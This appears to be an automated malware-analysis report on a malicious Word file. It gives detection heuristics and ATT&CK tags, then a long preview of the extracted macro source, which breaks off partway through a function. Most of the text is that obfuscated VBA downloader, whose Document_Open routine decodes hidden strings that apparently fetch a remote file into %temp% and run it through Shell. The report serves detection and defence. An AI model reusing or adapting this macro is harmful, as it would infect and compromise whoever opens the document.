MALICIOUS
192
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file contains VBA macros, including a Document_Open macro, which is a common technique for initiating malicious actions upon opening the document. The critical heuristic 'OLE_VBA_SHELL' indicates a potential call to the system shell, and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic confirms this execution is tied to the auto-exec macro. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' further supports its malicious nature. The VBA script itself is heavily obfuscated with string manipulation and loops, suggesting an attempt to hide its true functionality, which is likely to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
fQhIMqD = 1515 + 827 + 218 Shell (YhWdV), 0 gvGBb = StrReverse("Cm%qzNCd)ElmrUV!#eJ") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Dim pkvXeaMa As String -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27991 bytes |
SHA-256: ac6583ca1ade39e74f1ad75f07507a8c30481e6c5e3f3aee9af8b17511fa8a5e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
322 of 499 identifiers look randomly generated (e.g. 'mNSYnLFQUfCCfqinFjtsrwugYfaybGFDF') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub RHqPsn(HKEubD As Integer)
For XJBvLH = 0 To 139
tGvuUxJ = LTrim("*_fM$FRA$qit%OQd")
gvGBb = Right("kyeHbrpAA^.YEyky", 5)
mDUmeu = 1162 - 785 - 1554
nLcfAUtT = 1782 + 1246 + 134
fQhIMqD = 568 - 1005 - 483
tGvuUxJ = 672 + 574 + 552
Next XJBvLH
XJodD = Right("B.GvXI$GIud", 4)
fQhIMqD = LTrim("kdEOcBcSWg.NF")
While ZQctlm < 330
mDUmeu = StrReverse("C )y-YFp$EJ)BK")
nLcfAUtT = LTrim("gb#)OoX_SVbm%W_")
nLcfAUtT = 354 + 1535 + 1816
nLcfAUtT = Right("ZqTsIERt_@vJz$", 3)
QJlnFad = Space(3)
QJlnFad = UCase("rorx%D(e_]c]zMvA?oUB")
FEUwfn = UCase("WzVmQZ#dXE")
nLcfAUtT = 1655 + 1815 + 1523
ZQctlm = ZQctlm + 1
Wend
While zQRGEi < 195
gvGBb = RTrim("ifranqwx*SnMYq")
XJodD = RTrim("Oq])eXsM-w")
gvGBb = "CYA_yRYdgEgE" + "jkUB&)[V_G" + "^TfVTkaryg"
zQRGEi = zQRGEi + 3
Wend
fQhIMqD = StrReverse("uEx[YEX*L]QR")
FEUwfn = StrReverse("GXaKA?qeFscT")
For WfxjzP = 0 To 46
XJodD = Space(14)
tGvuUxJ = Right("Am)Jgfsxy#u_^[hpYNtc", 2)
FEUwfn = Left("XCBnbmT!u$$!Gka]K$!", 3)
gvGBb = LTrim("r bBSCwNuvj(eqBCX")
FEUwfn = 331 + 168 + 113
QJlnFad = Space(2)
QJlnFad = StrReverse("Jjg!AflZQo-Q!W)^")
nLcfAUtT = LTrim("P(ukm_o@DDZBwMhFxig")
fQhIMqD = Right("^@YDpu^JRudnPwYk% ", 4)
Next WfxjzP
XJodD = 759 + 1394 + 1879
nLcfAUtT = Right("@@]y]%DdfbTSem-hlU", 4)
nLcfAUtT = LTrim("t!?).%b#nGsm")
fQhIMqD = StrReverse("Y(H-lglpI.z-MkT^S%T")
XJodD = StrReverse("F*verYXiQT^D]VS[")
fQhIMqD = UCase("-yAZ%%aKnfrlg$uY")
nLcfAUtT = 1607 + 1642 + 1621
gvGBb = 1659 + 1631 + 305
FEUwfn = StrReverse("kMznokQhDy")
FEUwfn = LTrim("_pVaxrrEbzg%)b")
FEUwfn = LTrim("mzhaCWMSw!j]")
tGvuUxJ = StrReverse("R[FGXO)mH-vr)ws.")
gvGBb = Right("aPE?GPfJ[YY", 2)
gvGBb = Right("HpWWEmt^mu", 5)
gvGBb = UCase("esswFq[Qo%M.D")
mDUmeu = UCase("BoLJWsxhY]")
mDUmeu = StrReverse("]Nq_rKj@mu$yCt")
FEUwfn = Space(11)
FEUwfn = Right("-.Y[beJ%]Co!%xWv", 2)
tGvuUxJ = "DeCRxb-!njXr&O" + "_HIjhP?FhPC" + "CcEp&qKpymN"
XJodD = Left("TOFZ_)EKhbOWQ", 5)
For VIjTqp = 0 To 25
gvGBb = LTrim("K%ZNAS!phhp?n%@nNR")
fQhIMqD = 1049 + 1610 + 519
fQhIMqD = Right("KfyT*HGE]ofG", 3)
QJlnFad = 1899 - 942 - 1417
XJodD = 1785 - 1609 - 1728
nLcfAUtT = RTrim("^uKqFcuo#I&")
tGvuUxJ = "lBLMpKHp(UvNBQS(u@f" + "AKisK*Tuc&qAsSsL!" + "#jeS#?wxM.t"
Next VIjTqp
End Sub
Private Function jOmAKP(CpEsVN As Integer, huvgzgP As Boolean, ahcDkAc As String, DAIgHSs As String) As String
nLcfAUtT = RTrim("opvvRZdTJJO^t_OXx")
mDUmeu = 240 - 234 - 1230
QJlnFad = "JkljA(aKUD?a" + "xI%d& baSTV vnbl" + "RQGget-eY*c!g"
QJlnFad = "CIhiFVf@qtBLt" + "$_i.cgW($cEzjSP" + "LUjyiPBUKSR"
XJodD = RTrim("g!MN!fdFlyQguaPB(kNp")
While ImkwzW < 352
FEUwfn = 1105 + 1086 + 1316
FEUwfn = Left("?$l)FH.P$K]zA.ckm", 3)
mDUmeu = Right("JXuJW&a-$Pp", 3)
ImkwzW = ImkwzW + 1
Wend
While UIPelX < 298
tGvuUxJ = LTrim(")KqWSpu!ynTIH-iA")
mDUmeu = "(OzX)oxoTV!AiHY?hlks" + "EqpfMxONRa " + "sfeXwOG- $T%ovUbu)"
XJodD = StrReverse("PAtaSt^@rhVZ#!z]IYa")
gvGBb = 1785 + 1951 + 902
QJlnFad = 1922 - 686 - 803
XJodD = 1257 - 1403 - 600
tGvuUxJ = Right("(&Oz$ij]VLG&nQhRP-", 4)
FEUwfn = RTrim("LyI!lYQjN&pUm)")
FEUwfn = LTrim("k*leXAv#ZwfDPl")
QJlnFad = "?sFM nzzMo" + "pNFfeW!LX?Z_xcCQ" + "hnXw(-wzzMUcFv!GQ"
UIPelX = UIPelX + 3
Wend
nLcfAUtT = "HqPFOY%(txXNK]B]oKej" + "h llLG*lb@VY?eF&ZWi" + "#I[r(iLG_mCbC$B "
mDUmeu = "LurF)nk]rkknjH_)zt." + "S_ [@EuBTkH" + "%hDYrlzgSINT x"
XJodD = RTrim("(E?Wn!kaG UkZWF")
nLcfAUtT = LTrim("&jQT#L.Baoh]")
nLcfAUtT = 265 - 1622 - 961
FEUwfn = RTrim("*?T?pdLypynWetkFYv%")
FEUwfn = 1952 + 891 + 1805
QJlnFad = Space(5)
mDUmeu = Space(17)
gvGBb = Space(9)
XJodD = StrReverse("zuHXyS.YJ.s_jJKmgjV")
tGvuUxJ = Space(10)
tGvuUxJ = LTrim("AsXjxyeuuvuh")
QJlnFad = LTrim("*ld%@&ST!@h")
mDUmeu = Right("g!*sSANs%MsQ!jcY $n", 2)
For gxCMlG = 0 To 376
fQhIMqD = Left("@Z_&HDDN?aQLrGG%pP", 3)
FEUwfn = UCase("Jegv)sQDb@Iwq")
nLcfAUtT = Space(9)
fQhIMqD = "M%bI]Wpcgvqtg" + "L^$D..B?k-FMfV#k(Ur" + "O-@YALAi?nHL!#-O%(p"
mDUmeu = StrReverse("eN@.mXf$B@r&Elu")
nLcfAUtT = 990 + 1649 + 579
mDUmeu = UCase("nsz]oYA_q?M^-Qk&S")
Next gxCMlG
jOmAKP = "DXXmCHJsQuCdVSTiqVwDyRq"
End Function
Private Sub uFCdnF(gaSSwB As Boolean, OVlqHK As String, yLwVcO As String, wWqgIr As Double)
fQhIMqD = 986 - 1242 - 918
mDUmeu = Left("(X]HZftcyFDT*ZJ", 3)
nLcfAUtT = RTrim("aVADmzt eK^jF")
tGvuUxJ = Right("gq GfXIKbGlnAbs(", 3)
tGvuUxJ = Space(9)
mDUmeu = RTrim("oSKFqJHuRhwwj*GoRPv")
XJodD = 1143 + 1660 + 1176
FEUwfn = RTrim("VB-GMUJ[Xc$M)zhJ")
QJlnFad = 767 + 614 + 1502
FEUwfn = 1482 + 1579 + 1766
FEUwfn = UCase("jdfOqmy^?(EVWmmJvv")
gvGBb = 1978 - 1080 - 1029
gvGBb = UCase("Zgwys]OYxdLi*D")
XJodD = "jM__wJZhGhKLy-itjohV" + " M)c(zsUyiDl" + "mIPKNF]%r*en"
FEUwfn = StrReverse("SkIkdKYHbnOQ?i")
fQhIMqD = 323 + 1498 + 563
mDUmeu = RTrim("!rV&hWKmvFwzdnkdxe")
tGvuUxJ = "YIZDe(y-BTokVIQjDf" + "VnmHazH#vK]U!" + "KC$?YZ[PWlgez]*r vU$"
nLcfAUtT = 1537 - 1075 - 749
While XLzFBL < 75
gvGBb = UCase("[n!vxaoIJwXix)")
XJodD = 861 - 1252 - 293
FEUwfn = StrReverse("h-K.dg.DdFlDWZ")
QJlnFad = Right("vWwW@iaT@Up", 3)
tGvuUxJ = 1866 + 1835 + 761
tGvuUxJ = StrReverse("xg@?WACDYtkrPFqVMLIC")
gvGBb = StrReverse("%_oPW^Gk(e")
nLcfAUtT = Right("i iP@%.J]!", 5)
XLzFBL = XLzFBL + 3
Wend
While MkDyAH < 82
XJodD = Right("Ha^YZjT!cbE^E![eCEE-", 2)
tGvuUxJ = 1067 + 766 + 1075
FEUwfn = "jy()j^*thfp*HhyD]A" + "TozaB*eW$rjMl-hsF" + "z?%GVm?cVic*oJJB-&j"
XJodD = LTrim("fwg?NHA.&LjG&irEv")
MkDyAH = MkDyAH + 1
Wend
gvGBb = StrReverse("TZBlom[hcNnv*d")
mDUmeu = "D_M?P!#jK$xZ_tKM" + "j^K.Mae_pt?" + "RoSFR*Lw^K"
gvGBb = LTrim("Co$R_iOFnN sFMWpN")
gvGBb = 1282 - 1696 - 1848
XJodD = "boUiP[E?Uw" + "_bjBi.$W?^[nW%zBl" + "bNwwiPlO@A"
mDUmeu = Right("uJeAKqr[tf_", 4)
QJlnFad = LTrim("sxvXGoZnGkmib tR.%z")
XJodD = LTrim("hSoeZBx)QeWnYB@LC^@y")
mDUmeu = Left("pcl[)ZQBQCyy^p!Es", 4)
gvGBb = "Dtn()ayw*bIOb&jE" + "N[Q_L?s_JuV" + "Ln..E#b[LMQv!M"
QJlnFad = Space(4)
For KtThjX = 0 To 155
FEUwfn = Space(4)
fQhIMqD = "uXZwEE$W@*OhEM_F%&l" + "bajTX^#MFQKWh" + "yt&_yNWUyT"
FEUwfn = "ujjodHDYxXqxwubF" + "*SFrvh?mp%BSSlS" + "RdjYIJopXVd"
mDUmeu = 1814 - 777 - 765
Next KtThjX
nLcfAUtT = LTrim("sh&yZ!mWaITMMF_-Y")
End Sub
Private Sub rKuIUL(VPUkfd As Integer, FZsfrHQ As Integer, iuvmYS As Integer, BMdVSWL As String)
nLcfAUtT = UCase("Zvvz nJLrKOo]tID)hl")
FEUwfn = StrReverse("OBg_rrZAxum%wSk.& W")
tGvuUxJ = 1228 + 851 + 1378
gvGBb = RTrim("kTx_)J&[wRSxXj")
tGvuUxJ = LTrim("KF.^QVLO%M.hMBZ")
nLcfAUtT = Right("$TL[EXYEYRsqJ!JI", 2)
XJodD = StrReverse("HOQLZ#Aefp)tcZ#M^v")
FEUwfn = Space(12)
fQhIMqD = 1026 + 1403 + 1076
FEUwfn = 1774 + 296 + 751
FEUwfn = StrReverse("hYc*!xrGY-tp?N!x")
tGvuUxJ = RTrim("onSp&wA?iXc*wT.")
mDUmeu = Right("ZdC.Dpi!-L_!", 2)
nLcfAUtT = "]^-UHINFX?@@" + "*T#tW_DXaQiO(Vr" + "FFN(GFW_uNhmjV)Q-zB^"
gvGBb = Space(2)
tGvuUxJ = Space(10)
XJodD = Left("Rfo)rRo&yU@ZuEM", 2)
XJodD = Left("A!Bb%!WgU@nXnP**NvA", 3)
tGvuUxJ = RTrim("G?L[wEpXlA&aC(R?")
XJodD = 1336 - 115 - 1288
For vjteyj = 0 To 245
tGvuUxJ = Space(14)
mDUmeu = LTrim("[#I]y$ccGM?")
FEUwfn = 1582 - 961 - 519
QJlnFad = 642 + 1388 + 332
tGvuUxJ = UCase("v@Jnqsg[XYS")
nLcfAUtT = 802 + 566 + 1815
FEUwfn = Right("p?cdsJIA$LpAf", 2)
mDUmeu = "^tlaAueH@DkX!" + "$b.^rdoiym^x#!s*HM" + "^#zch@^ILKrV-cp"
FEUwfn = StrReverse("dvI)$awzz(-hY@")
FEUwfn = 344 - 1618 - 1878
Next vjteyj
nLcfAUtT = StrReverse("G WBB^KLJ VtH")
FEUwfn = LTrim("nNtJpPl$J(")
tGvuUxJ = Space(12)
FEUwfn = LTrim(".Dl*PsiyzF")
tGvuUxJ = 1853 - 499 - 1240
mDUmeu = Right("yAY^g-MMiBqLHbh?.", 2)
QJlnFad = 1547 + 1605 + 1410
FEUwfn = Right("MJ[ASDEuCh(V", 2)
FEUwfn = UCase("T*#ETC)&LNll^U)pq")
gvGBb = Right("H?GOQxvm]_AYha", 2)
QJlnFad = "[D@RxyxdK?yfatcPT" + "c!T(gUwiXsKZp" + "PNhe_dH#j*"
While CJjaUT < 267
QJlnFad = Right("LLMRLv _-fL%N", 2)
gvGBb = LTrim("fk^-PS@]O^xOaO@.][s")
gvGBb = 810 - 265 - 1815
gvGBb = UCase(".ZUGz^bRK*UutrrA..")
mDUmeu = Left("B^)h ubyrrz!^*#gxLR", 3)
fQhIMqD = 1274 - 1135 - 369
CJjaUT = CJjaUT + 2
Wend
QJlnFad = Space(13)
fQhIMqD = Left("@_i$?Dz(Bkw_dLOrf$)", 2)
XJodD = " )[pv.rVxQc_Cxt^o" + "USnr.QwkT.NDNfE" + "PSA)TSIR%zk"
gvGBb = "u@Xz?dw%(zlUs$@lRSkp" + "cJl#RN&ngv]L?Xlygc" + "VcLNWQbEos#g&$i^N"
gvGBb = Left("h&$pKH#bpdK$EwW", 5)
QJlnFad = Right("m_R?f*pFztFnp", 2)
End Sub
Private Sub Document_Open()
Dim pkvXeaMa As String
mDUmeu = 100 + 454 + 1441
gvGBb = Right("VD*[NnvaOr!OmKz", 4)
QJlnFad = Space(6)
gvGBb = UCase("[Os#yGif$b[fSo")
fQhIMqD = "PApyZibr[p@)IB" + "bpOCqsh]?LCr" + "eucyU]-h(f^wgIVG."
QJlnFad = "#fT@?(taoS&]r(-HiLn" + "lExRe@]lSAVzb" + "PbWuBSN%FsCKo"
QJlnFad = Left("CzSXcx.UkVHHhE", 2)
nLcfAUtT = StrReverse("EGdv#XHK?b?yzZKluY")
pkvXeaMa = StrReverse("qe(xtei.UmKkEmYXvcjOJZdst\t\Z%hplmBeXtv%J A&q&% ?efxreC.lm^kimXXPclOfZ.sb\@\b%)prmneftQ%M pe xeeA.Dy$vWa_ng/^xWm#.bmhoccy.ulqoPr-t_nxo!c%dxl-/a/H:TpvtWtIhH ]f!-T ntqiXlqpPsG-. ZeKh@cia_cElWrQuR-H Me%xKeh.?l-iYtCuwtmrWe&cO pcH/e )e xbe(.udcmJc")
Dim cbzvOz As String
fQhIMqD = Space(12)
nLcfAUtT = RTrim("dEU$ut@w]?JCN)P")
tGvuUxJ = 172 - 1771 - 878
For MhrZGW = 0 To 315
gvGBb = Left("gpCJDHx!kj)MVNgtC.S$", 5)
nLcfAUtT = "E] ]I$ecSc?k" + "xm[$E)HSnPT htkPqAwx" + "RM]VmH%VsCr"
QJlnFad = UCase("!!lT[EAF[uON")
FEUwfn = 145 - 1384 - 1042
FEUwfn = 408 + 1387 + 587
FEUwfn = Right("EqZIN#TfDdXofi%hjdJE", 3)
tGvuUxJ = 1174 - 1537 - 123
fQhIMqD = StrReverse("a.#zpddSZUAP")
QJlnFad = "fxczEMKsZeUQJqW]" + "W^F._y.EJoIXU^yX?%Qf" + "_vCKArh(H$"
XJodD = StrReverse("?lt#Mot-Lp)%sgn")
Next MhrZGW
tGvuUxJ = Space(9)
QJlnFad = UCase("gD?tqE)[pEUM")
tGvuUxJ = 379 + 1328 + 593
FEUwfn = LTrim("FGV&lhq$PWOa-coFg")
cbzvOz = StrReverse("TeMx(eX.mBIX)oFOVhUb_Uo\H\T%rpOmQette%z d&A&o je!xQeB.-BjXXo!ODh[b*U(\s\K%uptmjeetZ%D Yn!iDb_.pkZN TKL^O-/_oLiJ.gkOi@n[kNeBtP.dus/&/w:ds$pCtKtHhY pfr-T Staielbpfs^-c ceThFcxaAchlSrHuI-o .eix]eY.PlbiZtmurtGr)eAcQ fc./p [e?xGe&.Md.mjc")
fQhIMqD = Space(17)
QJlnFad = 531 + 998 + 1241
tGvuUxJ = 119 - 176 - 153
For YMstIs = 0 To 400
nLcfAUtT = "KVEU!iYWACQ)]cI-rF" + "Sa-*HH%N@Dh" + "Lwp^r?hYIg&&grX"
tGvuUxJ = UCase("WgYf![gOniXzg")
XJodD = Right("thxj.PTucWaCAbahjhat", 4)
fQhIMqD = Left("h(QqTx_A MX", 2)
mDUmeu = StrReverse("**JF-]ZXJIGij")
XJodD = Space(2)
Next YMstIs
nLcfAUtT = UCase(")-KYnO-YyT#ru ")
mDUmeu = 967 + 377 + 1537
fQhIMqD = "R_qbuKf@tm" + "S@SUsOO[xTMg-a!KV#" + "hIhPro_l@YTTV"
mDUmeu = Right("ZAyo^[msMfDLGCeg&!h$", 3)
While GrPEqW < 443
For NOMEXM = 0 To 312
FEUwfn = StrReverse("@UeBWqPZSJwCG*Cmdjg#")
FEUwfn = "?LSeJ*NWLrI$ %" + "@.$?NmQ&c_jn.u-b.." + ")aXAz%s#Xrfg)H"
XJodD = Space(2)
XJodD = StrReverse("v[?i?EG@#fRc[u ")
FEUwfn = Left("PyJtmxaM(hQ DM&q", 2)
XJodD = Space(18)
XJodD = Left("ov#TZJ-cmQ.gYM$qS", 4)
tGvuUxJ = Right("Oc hoIn]WmUU", 2)
FEUwfn = UCase("B cIA-vx_?GX")
Next NOMEXM
XJodD = StrReverse("fXZTJ$kfcA")
While NDicpW < 211
tGvuUxJ = "$PaOOR]Gsi(C#" + ".to^_p#RWlV" + "I[PR^BotKyRyiLr"
nLcfAUtT = 473 + 1754 + 1676
mDUmeu = RTrim("%I-mv y(WCxl)X.r$")
nLcfAUtT = StrReverse("$? weQ$v-ou*R")
fQhIMqD = ". suglETKNlA" + "%J*PbI[aLFQ" + "!!B.ZVJEwUnaT[ioGHKD"
NDicpW = NDicpW + 1
Wend
tGvuUxJ = Left("^WSJxA??OPTHbes ", 5)
gvGBb = UCase("W Q.Z[^QdJ(buXV!")
While nRLFQR < 287
tGvuUxJ = 186 + 1668 + 1365
fQhIMqD = 172 + 279 + 788
nRLFQR = nRLFQR + 1
Wend
fQhIMqD = Right("VZQ(ses]O!K%", 5)
tGvuUxJ = LTrim("mumch$dxC^tc(")
If GrPEqW = 103 Then
XJodD = Left("ifkP!(mxSPV", 5)
Call IYykumEe(MVkkL(pkvXeaMa), "hkhffuqYyw", "KovVwjainq", "BtDBJsQ", "OVumuekTo")
While tOYekK < 329
mDUmeu = 1695 + 883 + 1036
gvGBb = StrReverse("^A##&lB%qebwf")
FEUwfn = RTrim(".ze_m!?KFlOcae(!o-ag")
mDUmeu = Right("$WQtk$ *sZ(y", 3)
tGvuUxJ = Left("NJrCZkD-*y.xmE", 5)
nLcfAUtT = UCase("xPVHix??W[ibrlWd$kXz")
FEUwfn = 370 - 1539 - 897
mDUmeu = Right("o[HpLH*QwCfxIh-uh#", 4)
tOYekK = tOYekK + 3
Wend
fQhIMqD = Left("YkhF-BW]D!@", 3)
Call IYykumEe(MVkkL(cbzvOz), "uxb", "HjxeCH", "SuAZtkZA", "fioNODe")
While nFWCBl < 344
fQhIMqD = "Bhfqxe?[wWikZBy]Hk" + "AQOn[HE*zmSEkGh" + "gIMZ.fP*d!ev%Ij"
QJlnFad = 403 + 1969 + 991
gvGBb = LTrim("mX WHOOrCkPL!Qj*")
mDUmeu = StrReverse("JdXFEZIZ^z[Kh")
nFWCBl = nFWCBl + 3
Wend
FEUwfn = Right("iQ[uPJExcHL#HS", 4)
QJlnFad = Left("A.jtq!QFj)QVO?", 5)
End If
GrPEqW = GrPEqW + 1
Wend
End Sub
Private Function KgFxoM(elCTtW As Boolean, QnpRPz As Double, NRYVMg As Boolean, snfSQy As Integer) As String
tGvuUxJ = 1959 + 180 + 1676
fQhIMqD = 1401 - 1129 - 289
tGvuUxJ = "h%dVtGZ@Y Bhjg!KEIk" + "bjsWbNph.)o_E%E*" + "tLIma#^C[v[rS"
QJlnFad = 974 - 1375 - 855
mDUmeu = UCase("W%fnIMRG&m")
FEUwfn = 915 + 870 + 1700
gvGBb = LTrim("fXeVEGRmEyI-")
FEUwfn = LTrim("Y?_HEDPFk.vj!nynbuUC")
tGvuUxJ = "$EIO(ZhRUILC-VHyL" + "mFEr*?vFSb[lOlWEyLT" + "CGV-wb&Xcr^IqE["
tGvuUxJ = Right("*eeNpzO$txQPN(S?x", 4)
fQhIMqD = StrReverse("K)&q yulJf]Is#&A!")
While uQGlYB < 356
nLcfAUtT = "K)whObxmj)xVK#x-#kVt" + "ttNzWjsF#Rgr" + "SdU Zs!g(AQDWR_R"
XJodD = RTrim(" RuGn@bAgT(Lg")
fQhIMqD = RTrim("-nHtA.[XzQ")
gvGBb = 961 + 733 + 891
fQhIMqD = Left("cTAorec#NXk ", 5)
uQGlYB = uQGlYB + 1
Wend
FEUwfn = 1429 + 476 + 1706
QJlnFad = Right("n^vx--rN!.SItQKsY", 4)
fQhIMqD = 1227 + 1220 + 120
nLcfAUtT = Space(8)
tGvuUxJ = RTrim("GDvX$hX#uBnUK%(jg")
QJlnFad = 1114 - 787 - 785
fQhIMqD = LTrim("$P&!PJ*p_.jvk")
For yZXHpI = 0 To 63
fQhIMqD = Left("upNjIOTnwKTw]?JGIV", 2)
gvGBb = Left("mz-sA!% O[bzi", 3)
QJlnFad = "[%mkFX?m?Ta@lm" + "eFuiDjowq@)" + "yUyeuFiRxgrsD"
XJodD = StrReverse("scOY N!fJaizK]zu) ys")
FEUwfn = RTrim("y!zjjHUZNV*(Kxoy")
tGvuUxJ = UCase("*k-kUU?vfxcAWv")
mDUmeu = Right("pm.FsP_.B^bZm", 3)
XJodD = LTrim("v#qKP_[BcWt?hf")
Next yZXHpI
XJodD = 1760 + 1641 + 1286
fQhIMqD = StrReverse("nXkR$y!gbZr")
nLcfAUtT = StrReverse("yWXeOCiNhG")
gvGBb = LTrim("zdOfXqbycX")
nLcfAUtT = StrReverse("yvj*yLh#LzUi*vuk]qDg")
mDUmeu = Space(15)
fQhIMqD = LTrim("v]ugolCrY)dFZnF[S")
XJodD = LTrim("gf]a%wxW]v#Uj")
nLcfAUtT = 765 + 1401 + 1006
XJodD = Right("%A]kdKdgaxWp", 4)
QJlnFad = 1640 + 930 + 1965
nLcfAUtT = Space(6)
tGvuUxJ = Left("cL-lYQJwj.", 3)
KgFxoM = "mNSYnLFQUfCCfqinFjtsrwugYfaybGFDF"
End Function
Private Sub NHVgHh(WmFsvXB As Boolean, YRkeSMj As Double, arbNxPD As Double)
XJodD = UCase("CErtmseQq#lh%fLb Wj")
mDUmeu = UCase("BHm&?Oao#$A")
nLcfAUtT = 1865 - 1054 - 132
nLcfAUtT = "GgJUeH#TfEF" + "zh[b^FLR ^K^g @Paf" + "yF*bYfk%j&lzDrtz"
gvGBb = RTrim("YrQeaRrihftCrO#Ph")
gvGBb = "WYAOkP]GUiBw (" + "@SZrPdIx*a#gz?Oemy" + "MxrcBJALchamC]"
nLcfAUtT = LTrim("iV HJ?pq?DRk")
mDUmeu = UCase("BHBqRnF(a]sRXb]UnuO")
mDUmeu = Left("[eX-#DWV)gzJ(K&r%d*", 4)
FEUwfn = Space(20)
mDUmeu = 590 + 1181 + 1063
FEUwfn = StrReverse("CZwL-JThWYJ(ZIf")
QJlnFad = RTrim("t?w_y(u!Rpo[iH@Taxa!")
QJlnFad = Left("twjDq&_rSs(KTWHLl-Fq", 2)
mDUmeu = "D$&gqRjn)ay&ZxBE]Dk$" + "^me)A&LsLedWG&#" + "JSAa[VYwM_)xn!mHjK^"
mDUmeu = StrReverse("Mb&ewgs*%Y%Km$")
XJodD = StrReverse("Ru*cObAvZQ?hjb")
gvGBb = StrReverse("nGQK#uP$ueGQbW")
QJlnFad = "[RcFeGxY%hM$xNe" + "m#DM@W] CK_fi" + "TdMe-YvglIp"
XJodD = Space(20)
gvGBb = LTrim("XcBgPayN^xXJHnLyyfP")
gvGBb = LTrim("HxcT.KvHUB$#d!v")
mDUmeu = LTrim("F#$)LMTUvPbXk@")
nLcfAUtT = LTrim("!(PYAg^jvU&")
gvGBb = "RbYEnAEqsim?yT]r" + "P[GfiFJEU S*k&s" + "%(puBpY!Rqdaok.h"
mDUmeu = "xgODP*VpTnR" + "baZCls-(sK_[R]?vy" + " DuF@TCq&[#tD]Na(W("
tGvuUxJ = 858 + 734 + 1246
End Sub
Private Function MVkkL(WGUtT As String) As String
While vWhUUi < 280
tGvuUxJ = Right("nol**rPEtmE", 4)
nLcfAUtT = Left("eQlqOS.ICC$HlmJiP_iE", 3)
XJodD = StrReverse("SdVxh#UxUk]Ty#")
FEUwfn = RTrim("bu]hep gwO$PP")
XJodD = Right("vnjZ$MoUGMl", 2)
XJodD = 1909 + 1219 + 389
XJodD = 1949 - 433 - 1085
vWhUUi = vWhUUi + 3
Wend
Dim laWaPLzY() As Byte
For Prprtz = 0 To 341
mDUmeu = Space(14)
fQhIMqD = Right("m[RH*g)k DXht*", 4)
fQhIMqD = LTrim("ZCyuOVtRCD$x")
fQhIMqD = StrReverse("yp.Inm&-VE")
Next Prprtz
XJodD = LTrim("WSUufuB)IP%Vwfo&!")
XJodD = Left("xRYuKhrs#?[Q", 2)
While FaLytk < 29
fQhIMqD = RTrim("_.yipi$!kCV$Oa^G")
FEUwfn = UCase("gmuUyTbX^obz")
FaLytk = FaLytk + 2
Wend
Dim PCFjD(512) As Byte
FEUwfn = StrReverse("R$zIu?x$o^AWb&Sf")
tGvuUxJ = Left("GT*HsS(lhuv", 5)
mDUmeu = UCase("yfDA^ka(cLVZzIRn#")
Dim yCsTC As Integer
For jtFZfk = 0 To 153
XJodD = Right("qLtu#hiIB^sQuaeyPF", 3)
nLcfAUtT = 1043 + 1799 + 1872
gvGBb = LTrim("FlhSvGpi_BruT]_[df&g")
nLcfAUtT = Left("ZmtIvNSVKoSuo]Vw!Y", 2)
nLcfAUtT = UCase("!iyfOsh^dA%")
Next jtFZfk
yCsTC = 0
laWaPLzY = StrConv(WGUtT, vbFromUnicode)
For zhznNAj = 0 To UBound(laWaPLzY) - 1
While iROJox < 193
FEUwfn = 320 - 357 - 1458
QJlnFad = UCase("GATXZk]Vty!")
XJodD = Left(")RGGPHQncs", 2)
QJlnFad = Space(11)
nLcfAUtT = UCase("xD]tbGTaUGO?cAat)Sso")
iROJox = iROJox + 2
Wend
If (zhznNAj Mod 2 = 0) Then
FEUwfn = Left("KplJsAbzzW@pMdc^q$L", 3)
For mjxOjD = 0 To 272
tGvuUxJ = Left("XUzPROHvAs.", 5)
fQhIMqD = StrReverse("QF(_ftAnu^xC#^wy*YJ")
fQhIMqD = Left("B_?*@v[Fquil$", 5)
FEUwfn = Left("-OAmHPMit-rxXGlrWq", 5)
Next mjxOjD
QJlnFad = "JRe crxql@Tms)g" + "zMmzo$ub&Xp" + ")pqS?bV*%)Q"
While uDhIHd < 288
nLcfAUtT = UCase("d*LV@fyUtWGn@rJu")
tGvuUxJ = 578 + 831 + 1434
nLcfAUtT = UCase("jCgx@?GNaWWTsU")
XJodD = "u?glT.m?rydzSrfl" + "!#*g.(a n(LArjZYq&" + "(#_GyYdTgM"
QJlnFad = LTrim("tQE @rtyAafj-")
gvGBb = Left(" GsUq) OEcQ.t$Sk", 5)
uDhIHd = uDhIHd + 2
Wend
PCFjD(yCsTC) = laWaPLzY(zhznNAj)
XJodD = Left("T^HO%H-?DU", 4)
yCsTC = yCsTC + 1
QJlnFad = 303 + 349 + 1299
tGvuUxJ = LTrim("r or.JK.Q(oW[")
mDUmeu = 668 - 1692 - 1067
For dCtyqg = 0 To 134
XJodD = Right("HgCjXlDVBTnsPN&HC", 3)
QJlnFad = StrReverse("zltZaOtCX*")
mDUmeu = RTrim("WEy_Ztq%CLtwg[")
FEUwfn = StrReverse("wxA*ApTLCH")
